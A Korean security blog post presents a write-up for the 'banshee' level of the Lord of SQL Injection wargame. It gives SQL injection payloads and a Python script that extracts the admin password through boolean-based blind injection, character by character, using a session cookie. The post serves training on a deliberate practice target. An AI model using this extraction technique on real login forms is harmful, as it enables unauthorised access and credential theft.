$ whoami
Home
  • 분류 전체보기 (116)
    • Exploit (9)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (2)
    • Wargame (82)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (7)
      • XSS Challenges (8)
      • H4CKING GAME (3)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (25)
      • YISF 2022 (2)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
Home
  • 분류 전체보기 (116)
    • Exploit (9)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (2)
    • Wargame (82)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (7)
      • XSS Challenges (8)
      • H4CKING GAME (3)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (25)
      • YISF 2022 (2)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
블로그 내 검색
CONTACT

HACKINTOANETWORK

WEB APPLICATION BUG HUNTER, PENETRATION TESTER

  • Wargame/Lord of SQL Injection

    [Lord of SQL Injection] banshee

    2022. 10. 25.

    by. hackintoanetwork

    Prob


     

    Payload


    pw=' or id='admin' and length(pw)=8--%20
    pw=' or id='admin' and unicode(substr(pw,1,1))=48--%20

     

    Exploit


    import requests
    import string
    
    url = "https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?"
    cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'}
    
    def pw_length():
        pw_len = 0
        while True:
            pw_len += 1
            query = "pw=' or id='admin' and length(pw)={}-- ".format(pw_len)
            print(query)
            res = requests.get(url=url+query,cookies=cookie)
            if "login success!" in res.text:
                print("PASSWORD LENGTH : " + str(pw_len))
                break
        return pw_len
    
    
    def pw_char(pw_len):
        passwd = ""
        for i in range(1, pw_len+1):
            for j in string.printable:
                query = "pw=' or id='admin' and unicode(substr(pw,{},1))={}-- ".format(i,ord(j))
                print(query)
                res = requests.get(url=url+query,cookies=cookie)
                if "login success!" in res.text:
                    print("PASSWORD CHAR : " + j)
                    passwd += j
                    break
        print("PASSWORD : " + passwd)
    
    if __name__ == "__main__":
        pw_len = pw_length()
        pw_char(pw_len)
    저작자표시 비영리
    • 카카오스토리
    • 트위터
    • 페이스북

    'Wargame > Lord of SQL Injection' 카테고리의 다른 글

    [Lord of SQL Injection] poltergeist  (0) 2022.10.25
    [Lord of SQL Injection] manticore  (0) 2022.10.25
    [Lord of SQL Injection] chupacabra  (0) 2022.10.25
    [Lord of SQL Injection] cyclops  (0) 2022.10.23
    [Lord of SQL Injection] godzilla  (0) 2022.10.23
    Banshee, Lord of SQL Injection, Los, web hacking

    댓글 0

    관련글

    • [Lord of SQL Injection] poltergeist 2022.10.25
    • [Lord of SQL Injection] manticore 2022.10.25
    • [Lord of SQL Injection] chupacabra 2022.10.25
    • [Lord of SQL Injection] cyclops 2022.10.23
    맨 위로
전체 글 보기
Tistory 로그인
Tistory 로그아웃
로그아웃 글쓰기 관리

Today 0

Total 13,024

Powered by hackintoanetwork

Designed by Nana
블로그 이미지
hackintoanetwork

티스토리툴바